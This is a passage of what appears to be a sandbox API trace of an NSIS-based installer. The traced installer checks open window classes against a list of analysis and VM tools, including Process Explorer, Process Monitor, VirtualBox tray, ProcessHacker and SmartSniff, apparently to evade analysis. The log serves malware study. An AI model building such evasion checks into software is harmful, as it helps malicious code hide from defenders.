iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.479] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.479] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.480] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.480] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.480] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.480] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.480] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.480] lstrcpynA (in: lpString1=0x341200, lpString2="65692", iMaxLength=1024 | out: lpString1="65692") returned="65692" [0158.480] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.480] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.480] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.480] GetWindowTextA (in: hWnd=0x1009c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.480] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.480] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.480] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.481] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65692") returned 5 [0158.481] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.481] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.481] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.481] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.481] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.481] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.481] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.481] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.481] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.481] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.481] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.481] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.481] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.482] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.482] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.482] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.482] lstrcpynA (in: lpString1=0x3401e0, lpString2="65692", iMaxLength=1024 | out: lpString1="65692") returned="65692" [0158.482] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.482] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.482] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.482] GetClassNameA (in: hWnd=0x1009c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.482] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.482] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65692") returned 5 [0158.482] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.482] lstrlenA (lpString="0") returned 1 [0158.482] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] lstrlenA (lpString="tooltips_class32") returned 16 [0158.482] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.482] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.482] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] lstrlenA (lpString="tooltips_class32") returned 16 [0158.482] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrlenA (lpString="tooltips_class32") returned 16 [0158.484] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.484] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrlenA (lpString="tooltips_class32") returned 16 [0158.484] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.484] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrlenA (lpString="tooltips_class32") returned 16 [0158.484] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.484] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.484] lstrlenA (lpString="") returned 0 [0158.484] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.484] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.484] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.484] lstrlenA (lpString="") returned 0 [0158.484] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.484] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.484] lstrlenA (lpString="3399936") returned 7 [0158.484] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.484] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.484] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.484] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.485] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.485] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.485] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrlenA (lpString="") returned 0 [0158.485] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrlenA (lpString="") returned 0 [0158.485] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrlenA (lpString="") returned 0 [0158.485] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.485] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.485] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.485] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.485] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.486] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.486] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.486] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.486] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.486] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.486] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.486] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.486] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.486] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.486] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.486] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.486] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.486] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.487] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.487] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.487] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.487] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.487] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrlenA (lpString="0") returned 1 [0158.487] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.487] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.487] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.487] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrlenA (lpString="0") returned 1 [0158.487] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] lstrlenA (lpString="") returned 0 [0158.487] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.488] lstrlenA (lpString="3399936") returned 7 [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.488] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.488] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.488] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.488] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.488] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrlenA (lpString="") returned 0 [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrlenA (lpString="") returned 0 [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrlenA (lpString="") returned 0 [0158.488] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.489] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.489] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.489] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.489] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.489] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.489] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.489] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.489] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 